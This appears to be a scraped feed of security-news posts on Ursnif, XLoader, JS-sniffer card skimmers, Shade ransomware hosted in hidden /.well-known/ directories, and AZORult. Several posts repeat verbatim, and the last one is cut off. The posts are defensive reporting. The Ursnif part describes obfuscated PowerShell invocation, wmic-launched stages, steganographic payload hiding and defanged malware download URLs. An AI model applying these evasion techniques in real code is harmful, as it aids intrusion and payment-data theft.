The sample spread in February 2019 use two new features: the first one is a several obfuscated powershell stages in order to evade AVs and reduce its detection, the second one is the use of steganography technique. The latter permit to hide code into a legit image manipulating specific bits. Next, another code perform a decryption and execution of malicious code into the victim machine. 

In March 2019 another weaponized variant of Ursnif has been detected: in this case, to spread the malicious software, a google drive document combined with an obfuscated VBA Script is used over steganography. The last sample shown in previous table is similar to February’s sample but include another interesting feature: in this case a first VBS stage is encrypted using the Vigenere cipher; this allow to hide its malicious code and evade many sandboxes environment. We are observing a continuous evolution due to several features added in few months, this is an indicator that this malware is still in development and, observing also features fragmentation among variants lets us think, with high confidence, that there are various fork of the same codebase spreading in the wild.

Technical Analysis

Sha 25634669dde1e33ec96147540433f60e90056d38df1e3bb952fdc600e979d74f690
ThreatUrsnif dropper
Descrizione BreveExcel with macro
ssdeep1536:hn1DN3aMePUKccCEW8yjJTdrBX/3t4k3hOdsylKlgryzc4bNhZFGzE+cL4LgldAK:hn1DN3aM+UKc

Table 2: information about Ursnif dropper

The most widespread infection vector observed were the macro enabled office documents, and this variant uses the same technique too. The malicious document looks like an invoice that requires enabling macros in order to proper view its contents. 

Figure 1: excel document requiring macro enabling

The whole infection chain begins when the macro is enabled. This Ursnif variant presents a  macro protection technique technique that it’s not present in previous variants, in order to make the analysis hard avoiding manipulation and extraction. After extraction of OLE object inside the document we are able to see the content of macros and their associated name, as shown in the following figure:

Figure 2: macros isolation

Now it is possible to isolate an interesting macro in order to further analyze it in detail. It contains a piece of VBA that was extracted.

Figure 3: VB macro source code

In a different way than the past waves, the malware author added a “VigenereDo” function to decrypt and reconstruct the initial infection step, using an algorithm based on the Vigenère cipher, a classical polyalphabetic cipher. 

The resulting command text is obtained combining the obfuscated strings defined in “jeneric” function with other strings (not visible in figure) and after further some manipulations is possible to spot the whole script will be executed. When user enable macros, the “wmic.exe” process run the following code through the “wmic ‘PRocesS’   “Call” ‘CREATe’” command. 

Figure 4: the powershell script (crypted)

So, at this point, several powershell deobfuscation steps occurs. First of all, every value (“${1F}”) defined in the ps string is replaced with content stored into “$1F” variable corresponding to “,” (comma) character. After having replaced these values, the script is run through “iex” primitive invoked by “.($psHomE[4]+$pshOMe[34]+’X’)” and next through “( “. ( `$ShELLid[1]+`$shelLID[13]+’X’)”. The complete deobfuscated script is the following.

Figure 5:  the first powershell script (decrypted)
Figure 6: image with malicious embedded powershell script

First of all the malware checks the current TimeZone in order to verify if it is set on +01:00.  If true, it download the next stage from “hxxps://i[.]imgur[.]com/TVkWKQa[.]png”. As well as in other recent attacks, the downloaded image hides another powershell stage leveraging steganography techniques. 

The malware code iterates over each pixel of the image and through several mathematical binary operation converts grabs the two Least Significant Bits of every byte of the picture, concatenating them with other LSBs to produce a complete Powershell code.

Figure 7: second powershell script extracted from the steganographic image

Et voilà, another URL is found but, before download the next stage from it, the malware perform a further checking in order to evaluate the value returned by “CurrentCulture”. 

Figure 8: CurrentCulter verification in powershell

If check is verified, once again through the “IEX” primitive it try to download other components named “ose000000.exe” from “hxxps://nuovalo[.]site/RGI82B3.-tmp-tmp”, saving  it into “%TEMP%” folder. In the following table are shown the information about sample.

Sha 2560f2245eec921949d9a1d8e13cab747a7fbb137aaee3b9ddacee0681c8b2e4fa8
ThreatUrsnif
Descrizione BreveFinal payload of Ursnif banking malware
ssdeep6144:LCLAh6EzJYJtmavTXyulcNcyuo8PGJMewXo79y:L54EzetmCb3cNc3o0PR4

Table 3: information about Ursnif final payload

Conclusion

This latest Ursnif wave keeps showing a complex infection process. The starting point of the entire chain was the usual Visual Basic macro, this time protecting its code with a Vigenère cipher, responsible of the decryption of the additional Powershell stage launched abusing the Windows Management Infrastructure (WMI) functionalities, decoupling it to the original infection tree and then completing the infection chain exploiting steganography techniques to bypass network detection and several environmental check, to ensure the malware is running into expected machines confirming the highly evasive trend of this aggressive malware threat.

Further technical details, including Indicators of Compromise, are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Ursnif Trojan, cybercrime)

The post Ursnif: The Latest Evolution of the Most Popular Banking Malware appeared first on Security Affairs.



Security Affairs

Security Affairs: New XLoader variant leverage Twitter to hide C2 addresses

Security experts at Trend Micro spotted a new variant of the XLoader Trojan that is targeting Android devices by posing as a security application.

Trend Micro discovered a new variant of the XLoader Trojan that is targeting Android devices by posing as a security application, the malware also attempts to infect Apple devices (iPhones and iPads) through a malicious iOS profile. XLoader has been observed since 2018, but experts traced it back to January 2015, Trend Micro linked the threat to the FakeSpy malware.

The new XLoader Trojan variant features an updated deployment technique and includes code changes that make it different from previous variants.

The malicious code was observed in previous attacks posing as Facebook, Chrome, and other legitimate applications.

“Trend Micro researchers found a new variant that uses a different way to lure users. This new XLoader variant poses as a security app for Android devices, and uses a malicious iOS profile to affect iPhone and iPad devices.” reads the analysis published by Trend Micro. “Aside from a change in its deployment techniques, a few changes in its code set it apart from its previous versions.”

Attackers hosted the malicious code on fake websites mimicking legitimate websites such as the one belonging to a Japanese mobile phone operator. Hackers attempt to trick users into downloading the fake security Android application package (APK), they sent to the victims SMS messages containing links to the bogus websites.

When Android users access these websites or press any of the buttons they will be prompted the download of the malicious APK.

“However, successfully installing this malicious APK requires that the user has allowed the installation of such apps as controlled in the Unknown Sources settings. If users allow such apps to be installed, then it can be actively installed on the victim’s device.” continues the analysis.

The attack chain on iOS devices is more complex, users are served a phishing page that asks users to install a malicious configuration profile that is proposed as a solution to an issue preventing the site to load.

“Accessing the same malicious site would redirect its user to another malicious website (hxxp://apple-icloud[.]qwq–japan[.]com or hxxp://apple-icloud[.]zqo–japan[.]com) that prompts the user to install a malicious iOS configuration profile to solve a network issue preventing the site to load.” continues the analysis. “If the user installs the profile, the malicious website will open, revealing it to be an Apple phishing site,”

XLoader

Like previous versions of the XLoader 6.0, the latest one abuses social media user profiles to hide C&C addresses.
XLoader 6.0 leverages the social media platform Twitter, the C2 address is encoded in the Twitter names.

The malware leverages Twitter profiles to encode its real command and control (C&C) addresses in the Twitter names. It implements a command called “getPhoneState”, which collects unique identifiers of mobile devices such as IMSI, ICCID, Android ID, and device serial number. 

On Apple devices, the malicious iOS profile gathers the unique device identifier (UDID), International Mobile Equipment Identity (IMEI), Integrated Circuit Card ID (ICCID), mobile equipment identifier (MEID), version number, and product number. 

“After the profile is installed, the user will then be redirected to another Apple phishing site.” reads the analysis. “The phishing site uses the gathered information as its GET parameter, allowing the attacker to access the stolen information,” the security researchers say.

While analyzing this attack, experts spotted another variant of XLoader that poses as a pornography app developed to target South Korean Android users The malicious APK connects to a fake website that runs XLoader in the background and uses a different fixed Twitter account.

Experts also found a variant that leverages Instagram and Tumblr to hide its C&C infrastructure.

Further technical details, including Indicators of Compromise, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – XLoader, malware)

The post New XLoader variant leverage Twitter to hide C2 addresses appeared first on Security Affairs.



Security Affairs

New XLoader variant leverage Twitter to hide C2 addresses

Security experts at Trend Micro spotted a new variant of the XLoader Trojan that is targeting Android devices by posing as a security application.

Trend Micro discovered a new variant of the XLoader Trojan that is targeting Android devices by posing as a security application, the malware also attempts to infect Apple devices (iPhones and iPads) through a malicious iOS profile. XLoader has been observed since 2018, but experts traced it back to January 2015, Trend Micro linked the threat to the FakeSpy malware.

The new XLoader Trojan variant features an updated deployment technique and includes code changes that make it different from previous variants.

The malicious code was observed in previous attacks posing as Facebook, Chrome, and other legitimate applications.

“Trend Micro researchers found a new variant that uses a different way to lure users. This new XLoader variant poses as a security app for Android devices, and uses a malicious iOS profile to affect iPhone and iPad devices.” reads the analysis published by Trend Micro. “Aside from a change in its deployment techniques, a few changes in its code set it apart from its previous versions.”

Attackers hosted the malicious code on fake websites mimicking legitimate websites such as the one belonging to a Japanese mobile phone operator. Hackers attempt to trick users into downloading the fake security Android application package (APK), they sent to the victims SMS messages containing links to the bogus websites.

When Android users access these websites or press any of the buttons they will be prompted the download of the malicious APK.

“However, successfully installing this malicious APK requires that the user has allowed the installation of such apps as controlled in the Unknown Sources settings. If users allow such apps to be installed, then it can be actively installed on the victim’s device.” continues the analysis.

The attack chain on iOS devices is more complex, users are served a phishing page that asks users to install a malicious configuration profile that is proposed as a solution to an issue preventing the site to load.

“Accessing the same malicious site would redirect its user to another malicious website (hxxp://apple-icloud[.]qwqjapan[.]com or hxxp://apple-icloud[.]zqojapan[.]com) that prompts the user to install a malicious iOS configuration profile to solve a network issue preventing the site to load.” continues the analysis. “If the user installs the profile, the malicious website will open, revealing it to be an Apple phishing site,”

XLoader

Like previous versions of the XLoader 6.0, the latest one abuses social media user profiles to hide C&C addresses.
XLoader 6.0 leverages the social media platform Twitter, the C2 address is encoded in the Twitter names.

The malware leverages Twitter profiles to encode its real command and control (C&C) addresses in the Twitter names. It implements a command called “getPhoneState”, which collects unique identifiers of mobile devices such as IMSI, ICCID, Android ID, and device serial number. 

On Apple devices, the malicious iOS profile gathers the unique device identifier (UDID), International Mobile Equipment Identity (IMEI), Integrated Circuit Card ID (ICCID), mobile equipment identifier (MEID), version number, and product number. 

“After the profile is installed, the user will then be redirected to another Apple phishing site.” reads the analysis. “The phishing site uses the gathered information as its GET parameter, allowing the attacker to access the stolen information,” the security researchers say.

While analyzing this attack, experts spotted another variant of XLoader that poses as a pornography app developed to target South Korean Android users The malicious APK connects to a fake website that runs XLoader in the background and uses a different fixed Twitter account.

Experts also found a variant that leverages Instagram and Tumblr to hide its C&C infrastructure.

Further technical details, including Indicators of Compromise, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – XLoader, malware)

The post New XLoader variant leverage Twitter to hide C2 addresses appeared first on Security Affairs.

Security Affairs: Group-IB report: JS-sniffers infected 2440 websites around the world

Crime without punishment: Group-IB issues a new report on JS-sniffers that infected 2440 websites around the world

Group-IB, an international company that specializes in preventing cyberattacks, has issued a new comprehensive report on the analysis of JavaScript-sniffers – a type of malware designed to steal customer payment data from online stores. 2440 infected ecommerce websites with a total of around 1.5 million unique daily visitors whose data could have been compromised, were analyzed by Group-IB researchers.  Group-IB’s report features an in-depth analysis of JS-sniffers’ darknet market, their entire infrastructure and the monetization methods, which bring their developers millions of dollars.

New threats for E-commerce market

The e-commerce market is booming. A rare person does not buy online now. According to a Pew Research Center survey of U.S. adults, eight-in-ten Americans are online shoppers. However the convenience of online shopping has its downsides: users who use payment cards for online shopping face countless cyber threats, including JavaScript-sniffers.

Prior to the publication of Group-IB’s report “Crime without punishment: In-depth analysis of JS-sniffers” the researchers at RiskIQ and Flashpoint were the first to publish a joint report on the activities of cybercriminals using JS-sniffers. They gave the umbrella term MageCart to 12 cybercriminal groups. Group-IB experts studied the discovered JS-sniffers and, using their own analytical systems, were able to discover their entire infrastructure and gain access to their source codes, administrative panels, and cybercriminals’ tools. This approach helped identify 38 unique JS-sniffers’ families, 15 of which are presented in detail in the report, available for Group-IB Threat Intelligence customers.  At least 8 of them were discovered and described for the very first time.

The threat posed by JS-sniffers was long under the radar of malware analysts, who deemed it insignificant and unworthy of an in-depth research. However, several incidents have shown the opposite to be true, including: 380,000 victims of a JS-sniffer that infected the British Airways website and mobile app, the compromise of Ticketmaster users’ payment data, and the recent incident involving the UK website of the international sporting goods giant Fila, which could have led to the theft of payment details of at least 5,600 customers. “When a website is infected, everyone is a victim – end users, payment systems, banks, and companies that sell their goods and services online,” says Dmitry Volkov, CTO and Head of Threat Intelligence at Group-IB. “The fact that there is still little known about incidents involving JS-sniffers and the damages they cause indicates that this problem is understudied, which allows groups developing sniffers to steal money from online shoppers act with impunity and get away with it.”

JavaScript-sniffers: a “hidden threat” you don’t want to know about

A JS-sniffer is the online equivalent of a credit card skimmer. However, while a skimmer is a small device installed on ATMs that intercepts bank card details, a JS-sniffer is a few lines of code that cybercriminals inject into websites to capture data entered by users, such as payment card numbers, names, addresses, passwords, etc. In general, hackers sell the obtained payment data to carders on darknet forums. The price for a stolen card ranges from around $1 to $5, occasionally from $10 to $15. A significant number of underground forums where JS-sniffers are put up for sale or rent are Russian-speaking.

Approximate estimates suggest that the profits made by JS-sniffer developers may amount to hundreds of thousands of dollars per month. For instance, websites infected by the WebRank family of JS-sniffers attract around 250,000 visitors every day. If the conversion on these websites was only 1%, this would mean that 2,500 shoppers carry out transactions every single day. This in turn means that, at the minimum price range charged for stolen cards, WebRank developers can make between $2,500 and $12,500 for a JS-sniffer’s one day of “work”, which amounts to $75,000 to $375,000 per month. Not to mention that WebRank is only third in the “ranking” of mass infections. Websites infected by MagentoName and CoffeMokko JS-sniffers attract more than 440,000 visitors per day.

How JS-sniffers attack

Group-IB’s analysis of 2,440 infected websites revealed that more than half or resources were attacked by MagentoName JS-sniffer family, whose operators exploit vulnerabilities of older versions of the Magento CMS (Content Management System) to inject malicious code into the codes of websites powered by this CMS. More than 13% of infections are carried out by WebRank JS-sniffers family, which attacks third-party sites to inject its malicious code into the targeted websites. More than 11% of infections are also carried out by JS-sniffers from the CoffeMokko family, whose operators use obfuscated scripts designed to steal information from payment forms of payment systems, whose field names are hardcoded into the JS-sniffer’s code. Such payment systems include PayPal, Verisign, Authorize.net, eWAY, Sage Pay, WorldPay, Stripe, USAePay, and others. Many JS-sniffer families use a unique options for each payment system, which requires modifying and testing the script before each infection.

Most identified JS-sniffers are set up to steal information from different types of payment forms of website management systems such as Magento, OpenCart, Shopify, WooCommerce, WordPress. Such JS-sniffer families include PreMage, MagentoName, FakeCDN, Qoogle, GetBilling, and PostEval. Other JS-Sniffers are universal and can be integrated into the code of any website, regardless of the systems used (G-Analytics, WebRank).

During its research, Group-IB discovered signs of “competition”: some JS-sniffer families could detect and eliminate JS-sniffers belonging to competitors that injected the victim’s website first (for example, MagentoName). Others use the “body” of the competitor’s JS-sniffer, “taking over” the data it intercepts and transferring it to its own gate (for example, WebRank). JS-sniffers can be modified to make it more difficult to detect them. For example, ImageID and ReactGet are able to bypass most detection systems because they are activated only when the buyer is completing their transaction on the website; the rest of the time, the JS-sniffer is “inactive” and doesn’t give itself away. Some families have a number of unique JS-sniffers for each infection, such as CoffeMokko. Each JS-sniffer in this family is used only once to infect a single website.

The G-Analytics JS-sniffers family is distinctive in that it not only injects malicious code into website’s HTML code but also the server-side PHP scripts that handle payments on e-commerce websites. This technique makes it significantly more difficult for analysts to detect the malicious code. JS-sniffers such as ImageID and G-Analytics are able to imitate legitimate services such as Google Analytics and jQuery and disguise their malicious activity with legitimate scripts and domain names that are similar to legitimate ones.

Attacks involving JS-sniffers can have several stages. When analysing the code of one of the infected online stores, Group-IB’s specialists discovered that the cybercriminals had not limited themselves to simply injecting the JS-sniffer, but created a fake payment form that was loaded from a different compromised website. The form gave users two payment options: by credit card or PayPal. If the user chose to pay via PayPal, the fake form would show an error message saying that this payment method was currently unavailable, and the only way to pay was using a credit card.

Customers and buyers: how the JS-sniffer market works

The development of the JS-sniffer market has led to relationships between its players becoming increasingly complicated. JS-Sniffer can be used by not only the cybercriminal group that developed it, but also by other groups that have bought or rented the JS-sniffer as-a-service. In some cases, it is difficult to determine just how many cybercriminal groups are using a given JS-sniffer, which is why Group-IB experts call them families, not groups.

JS-sniffers’ cost ranges from $250 to $5,000 on underground forums. Some services offer partnerships: the customer provides access to the compromised online store and receives a share of the profits, while the JS-sniffer developer is responsible for providing hosting servers, tech support, and an administrative panel for the customer. Such “market relationships” between developers, sellers, intermediaries and buyers on the underground market make it difficult to attribute the crime committed to a particular group. Nevertheless, the indicators collected by Group-IB linked to the activities of each of the 38 JS-sniffer families help solve this problem. Moreover, Group-IB’s report contains detailed recommendations for all parties that may fall victim to JS-sniffers: shoppers, banks, online stores, and payment systems. The research continues. Descriptions of analysed JS-sniffers and new information about them are regularly uploaded to Group-IB’s Threat Intelligence system.

About the author: Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

The report published by Group-IB is available here:

https://www.group-ib.com/resources/threat-research/js-sniffers.html

Pierluigi Paganini

(SecurityAffairs – JS-sniffers, cybercrime)

The post Group-IB report: JS-sniffers infected 2440 websites around the world appeared first on Security Affairs.



Security Affairs

Group-IB report: JS-sniffers infected 2440 websites around the world

Crime without punishment: Group-IB issues a new report on JS-sniffers that infected 2440 websites around the world

Group-IB, an international company that specializes in preventing cyberattacks, has issued a new comprehensive report on the analysis of JavaScript-sniffers – a type of malware designed to steal customer payment data from online stores. 2440 infected ecommerce websites with a total of around 1.5 million unique daily visitors whose data could have been compromised, were analyzed by Group-IB researchers.  Group-IB’s report features an in-depth analysis of JS-sniffers’ darknet market, their entire infrastructure and the monetization methods, which bring their developers millions of dollars.

New threats for E-commerce market

The e-commerce market is booming. A rare person does not buy online now. According to a Pew Research Center survey of U.S. adults, eight-in-ten Americans are online shoppers. However the convenience of online shopping has its downsides: users who use payment cards for online shopping face countless cyber threats, including JavaScript-sniffers.

Prior to the publication of Group-IB’s report “Crime without punishment: In-depth analysis of JS-sniffers” the researchers at RiskIQ and Flashpoint were the first to publish a joint report on the activities of cybercriminals using JS-sniffers. They gave the umbrella term MageCart to 12 cybercriminal groups. Group-IB experts studied the discovered JS-sniffers and, using their own analytical systems, were able to discover their entire infrastructure and gain access to their source codes, administrative panels, and cybercriminals’ tools. This approach helped identify 38 unique JS-sniffers’ families, 15 of which are presented in detail in the report, available for Group-IB Threat Intelligence customers.  At least 8 of them were discovered and described for the very first time.

The threat posed by JS-sniffers was long under the radar of malware analysts, who deemed it insignificant and unworthy of an in-depth research. However, several incidents have shown the opposite to be true, including: 380,000 victims of a JS-sniffer that infected the British Airways website and mobile app, the compromise of Ticketmaster users’ payment data, and the recent incident involving the UK website of the international sporting goods giant Fila, which could have led to the theft of payment details of at least 5,600 customers. “When a website is infected, everyone is a victim – end users, payment systems, banks, and companies that sell their goods and services online,” says Dmitry Volkov, CTO and Head of Threat Intelligence at Group-IB. “The fact that there is still little known about incidents involving JS-sniffers and the damages they cause indicates that this problem is understudied, which allows groups developing sniffers to steal money from online shoppers act with impunity and get away with it.”

JavaScript-sniffers: a “hidden threat” you don’t want to know about

A JS-sniffer is the online equivalent of a credit card skimmer. However, while a skimmer is a small device installed on ATMs that intercepts bank card details, a JS-sniffer is a few lines of code that cybercriminals inject into websites to capture data entered by users, such as payment card numbers, names, addresses, passwords, etc. In general, hackers sell the obtained payment data to carders on darknet forums. The price for a stolen card ranges from around $1 to $5, occasionally from $10 to $15. A significant number of underground forums where JS-sniffers are put up for sale or rent are Russian-speaking.

Approximate estimates suggest that the profits made by JS-sniffer developers may amount to hundreds of thousands of dollars per month. For instance, websites infected by the WebRank family of JS-sniffers attract around 250,000 visitors every day. If the conversion on these websites was only 1%, this would mean that 2,500 shoppers carry out transactions every single day. This in turn means that, at the minimum price range charged for stolen cards, WebRank developers can make between $2,500 and $12,500 for a JS-sniffer’s one day of “work”, which amounts to $75,000 to $375,000 per month. Not to mention that WebRank is only third in the “ranking” of mass infections. Websites infected by MagentoName and CoffeMokko JS-sniffers attract more than 440,000 visitors per day.

How JS-sniffers attack

Group-IB’s analysis of 2,440 infected websites revealed that more than half or resources were attacked by MagentoName JS-sniffer family, whose operators exploit vulnerabilities of older versions of the Magento CMS (Content Management System) to inject malicious code into the codes of websites powered by this CMS. More than 13% of infections are carried out by WebRank JS-sniffers family, which attacks third-party sites to inject its malicious code into the targeted websites. More than 11% of infections are also carried out by JS-sniffers from the CoffeMokko family, whose operators use obfuscated scripts designed to steal information from payment forms of payment systems, whose field names are hardcoded into the JS-sniffer’s code. Such payment systems include PayPal, Verisign, Authorize.net, eWAY, Sage Pay, WorldPay, Stripe, USAePay, and others. Many JS-sniffer families use a unique options for each payment system, which requires modifying and testing the script before each infection.

Most identified JS-sniffers are set up to steal information from different types of payment forms of website management systems such as Magento, OpenCart, Shopify, WooCommerce, WordPress. Such JS-sniffer families include PreMage, MagentoName, FakeCDN, Qoogle, GetBilling, and PostEval. Other JS-Sniffers are universal and can be integrated into the code of any website, regardless of the systems used (G-Analytics, WebRank).

During its research, Group-IB discovered signs of “competition”: some JS-sniffer families could detect and eliminate JS-sniffers belonging to competitors that injected the victim’s website first (for example, MagentoName). Others use the “body” of the competitor’s JS-sniffer, “taking over” the data it intercepts and transferring it to its own gate (for example, WebRank). JS-sniffers can be modified to make it more difficult to detect them. For example, ImageID and ReactGet are able to bypass most detection systems because they are activated only when the buyer is completing their transaction on the website; the rest of the time, the JS-sniffer is “inactive” and doesn’t give itself away. Some families have a number of unique JS-sniffers for each infection, such as CoffeMokko. Each JS-sniffer in this family is used only once to infect a single website.

The G-Analytics JS-sniffers family is distinctive in that it not only injects malicious code into website’s HTML code but also the server-side PHP scripts that handle payments on e-commerce websites. This technique makes it significantly more difficult for analysts to detect the malicious code. JS-sniffers such as ImageID and G-Analytics are able to imitate legitimate services such as Google Analytics and jQuery and disguise their malicious activity with legitimate scripts and domain names that are similar to legitimate ones.

Attacks involving JS-sniffers can have several stages. When analysing the code of one of the infected online stores, Group-IB’s specialists discovered that the cybercriminals had not limited themselves to simply injecting the JS-sniffer, but created a fake payment form that was loaded from a different compromised website. The form gave users two payment options: by credit card or PayPal. If the user chose to pay via PayPal, the fake form would show an error message saying that this payment method was currently unavailable, and the only way to pay was using a credit card.

Customers and buyers: how the JS-sniffer market works

The development of the JS-sniffer market has led to relationships between its players becoming increasingly complicated. JS-Sniffer can be used by not only the cybercriminal group that developed it, but also by other groups that have bought or rented the JS-sniffer as-a-service. In some cases, it is difficult to determine just how many cybercriminal groups are using a given JS-sniffer, which is why Group-IB experts call them families, not groups.

JS-sniffers’ cost ranges from $250 to $5,000 on underground forums. Some services offer partnerships: the customer provides access to the compromised online store and receives a share of the profits, while the JS-sniffer developer is responsible for providing hosting servers, tech support, and an administrative panel for the customer. Such “market relationships” between developers, sellers, intermediaries and buyers on the underground market make it difficult to attribute the crime committed to a particular group. Nevertheless, the indicators collected by Group-IB linked to the activities of each of the 38 JS-sniffer families help solve this problem. Moreover, Group-IB’s report contains detailed recommendations for all parties that may fall victim to JS-sniffers: shoppers, banks, online stores, and payment systems. The research continues. Descriptions of analysed JS-sniffers and new information about them are regularly uploaded to Group-IB’s Threat Intelligence system.

About the author: Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

The report published by Group-IB is available here:

https://www.group-ib.com/resources/threat-research/js-sniffers.html

Pierluigi Paganini

(SecurityAffairs – JS-sniffers, cybercrime)

The post Group-IB report: JS-sniffers infected 2440 websites around the world appeared first on Security Affairs.

35+ Powerful Cybersecurity Statistics to Know in 2019

Cyberattacks are nothing new, but they’re a growing problem for all types of businesses across all industries. Depending on the severity of the attack, there are a variety of defense

The post 35+ Powerful Cybersecurity Statistics to Know in 2019 appeared first on The Cyber Security Place.

Crooks use hidden directories of compromised HTTPS sites to deliver malware

Attackers Store Malware in Hidden Directories of Compromised HTTPS Sites

Security experts at Zscaler discovered that threat actors are using hidden “well-known” directories of HTTPS sites to store and deliver malicious payloads.

Crooks are utilizing hidden “well-known” directories of HTTPS sites running WordPress and Joomla websites to store and serve malicious payloads.

Hacked websites were used for several malicious purposes, experts observed compromised WordPress and Joomla websites serving Shade/Troldesh ransomware, coin miners, backdoors, and some times were involved in phishing campaigns.

WordPress sites compromised by hackers were running versions 4.8.9 to 5.1.1 of the popular CMS that are affected by a cross-site request forgery (CSRF) flaw that resides in the comment section of WordPress that is enabled by default.

An attacker can hack a website running a vulnerable version of WordPress that has comments enabled by tricking an administrator of a target site into visiting a website set up by the attacker. 

According to the experts, the cybercriminals targeted websites running outdated CMS plugins and themes or server-side software. Compromised websites were using SSL certificates issued by Automatic Certificate Management Environment (ACME)-driven certificate authorities, such as Let’s Encrypt, GlobalSign, cPanel, and DigiCert.

“We have been monitoring the compromised HTTPS sites for a few weeks and have noticed that attackers are favoring a well-known hidden directory present on the HTTPS website for storing and distributing Shade ransomware and phishing pages.” reads the analysis from Zscaler.

“The hidden /.well-known/ directory in a website is a URI prefix for well-known locations defined by IETF and commonly used to demonstrate ownership of a domain. The administrators of HTTPS websites that use ACME to manage SSL certificates place a unique token inside the /.well-known/acme-challenge/ or /.well-known/pki-validation/ directories to show the certificate authority (CA) that they control the domain.”

Threat actors abused a well-known hidden directory in the HTTPS sites for storing the malware. The directory is a URI prefix for well-known locations defined by IETF and used to demonstrate the ownership of a domain.

Administrators of HTTPS websites using ACME to manage SSL certificates place a unique token inside the folder, to show the CA that the domain is under their control. The CA scans this folder for a code that was previously sent to the administrator.

“The attackers use these locations to hide malware and phishing pages from the administrators. The tactic is effective because this directory is already present on most HTTPS sites and is hidden, which increases the life of the malicious/phishing content on the compromised site,” continues Zscaler

The following graph shows different types of threats that were distributed with this approach, the Shade ransomware was the most common one:

HTTPs hidden “well-known” directories

Compromises websites delivering the Shade/Troldesh ransomware, included three types of files, namely HTML, ZIP, and EXE files masquerading as .jpg images.

HTML files are used to redirect victims to download ZIP files (
reso.ziprolf.zip, and stroi-invest.zip) that contain the JavaScript file.
msg.jpg and msges.jpg are EXE files that are the Shade ransomware.

The variant of Shade/Troldesh ransomware involved in the attack uses a TOR client to connect to the C2 and encrypts both the content and name of targeted files.

Attackers used phishing pages related to several popular services and brands, such as Office 365, Microsoft, DHL, Dropbox, Bank of America, Yahoo, Gmail, and other brands, the security researchers say.

Further technical details are, including Indicators of Compromise, are reported in the analysis.

Pierluigi Paganini

(SecurityAffairs – HTTPs, Hacking)

The post Crooks use hidden directories of compromised HTTPS sites to deliver malware appeared first on Security Affairs.

Security Affairs: Crooks use hidden directories of compromised HTTPS sites to deliver malware

Attackers Store Malware in Hidden Directories of Compromised HTTPS Sites

Security experts at Zscaler discovered that threat actors are using hidden “well-known” directories of HTTPS sites to store and deliver malicious payloads.

Crooks are utilizing hidden “well-known” directories of HTTPS sites running WordPress and Joomla websites to store and serve malicious payloads.

Hacked websites were used for several malicious purposes, experts observed compromised WordPress and Joomla websites serving Shade/Troldesh ransomware, coin miners, backdoors, and some times were involved in phishing campaigns.

WordPress sites compromised by hackers were running versions 4.8.9 to 5.1.1 of the popular CMS that are affected by a cross-site request forgery (CSRF) flaw that resides in the comment section of WordPress that is enabled by default.

An attacker can hack a website running a vulnerable version of WordPress that has comments enabled by tricking an administrator of a target site into visiting a website set up by the attacker. 

According to the experts, the cybercriminals targeted websites running outdated CMS plugins and themes or server-side software. Compromised websites were using SSL certificates issued by Automatic Certificate Management Environment (ACME)-driven certificate authorities, such as Let’s Encrypt, GlobalSign, cPanel, and DigiCert.

“We have been monitoring the compromised HTTPS sites for a few weeks and have noticed that attackers are favoring a well-known hidden directory present on the HTTPS website for storing and distributing Shade ransomware and phishing pages.” reads the analysis from Zscaler.

“The hidden /.well-known/ directory in a website is a URI prefix for well-known locations defined by IETF and commonly used to demonstrate ownership of a domain. The administrators of HTTPS websites that use ACME to manage SSL certificates place a unique token inside the /.well-known/acme-challenge/ or /.well-known/pki-validation/ directories to show the certificate authority (CA) that they control the domain.”

Threat actors abused a well-known hidden directory in the HTTPS sites for storing the malware. The directory is a URI prefix for well-known locations defined by IETF and used to demonstrate the ownership of a domain.

Administrators of HTTPS websites using ACME to manage SSL certificates place a unique token inside the folder, to show the CA that the domain is under their control. The CA scans this folder for a code that was previously sent to the administrator.

“The attackers use these locations to hide malware and phishing pages from the administrators. The tactic is effective because this directory is already present on most HTTPS sites and is hidden, which increases the life of the malicious/phishing content on the compromised site,” continues Zscaler

The following graph shows different types of threats that were distributed with this approach, the Shade ransomware was the most common one:

HTTPs hidden “well-known” directories

Compromises websites delivering the Shade/Troldesh ransomware, included three types of files, namely HTML, ZIP, and EXE files masquerading as .jpg images.

HTML files are used to redirect victims to download ZIP files (
reso.ziprolf.zip, and stroi-invest.zip) that contain the JavaScript file.
msg.jpg and msges.jpg are EXE files that are the Shade ransomware.

The variant of Shade/Troldesh ransomware involved in the attack uses a TOR client to connect to the C2 and encrypts both the content and name of targeted files.

Attackers used phishing pages related to several popular services and brands, such as Office 365, Microsoft, DHL, Dropbox, Bank of America, Yahoo, Gmail, and other brands, the security researchers say.

Further technical details are, including Indicators of Compromise, are reported in the analysis.

Pierluigi Paganini

(SecurityAffairs – HTTPs, Hacking)

The post Crooks use hidden directories of compromised HTTPS sites to deliver malware appeared first on Security Affairs.



Security Affairs

Analyzing AZORult malware using NSA Ghidra suite

Cybaze-Yoroi ZLAB malware researchers decided to use the NSA Ghidra suite in a real case study, the analysis of the AZORult malware.

Introduction

One of the most expected moments in the infosec community during the last few months was, with no doubt, the Ghidra public release. On the 5th of March, at the RSA conference, Ghidra has been presented to the public revealing the inner details of the Software Reverse Engineering (SRE) framework that National Security Agency used for more than a decade.

Its release was a sort of “main event” for security researchers all around the globe, which immediately started exploring its functionalities to find out its place within the reversing tool panorama. Cybaze-Yoroi ZLAB team also decided to play around with it, but this time using a real case study, AZORult: one of the most active threats spreading nowadays, always using new methodologies to avoid detection. For this reason, a recent AZORult sample has been chosen to field-test the NSA reverse engineering tool.

Technical Analysis

Hash12a7b79430bf3b788396009eadb6cbc4da97cba55c6653048d2dd294fa90dc3a
ThreatAzorult
Size809 KB
SSDEEP12288:KKi7ifyf5/TIEAcp2o/DZDlvs6SskijhnHW3/qgQrjSh4rNxPXJE:K6m5UYZRUokohnH4QrjCCP5E

The sample is a PE32 file apparently coded in Visual C++, containing references to major IT companies in its metadata fields like Google and Amazon.

Figure 1: Static information about the sample

Dynamically executing the malware, we are able to isolate only a few actions of the malware, because its C2 server wasn’t active at the time of analysis, probably due to a configuration error.

Figure 2: Communication of the malware with the C2

So, after contacting the server, the sample does not have the possibility to download other components and configurations. Thus, the malware kills itself and terminates its execution.  For this reason, we focused the investigation into static analysis and debugging.

Digging into the Sample

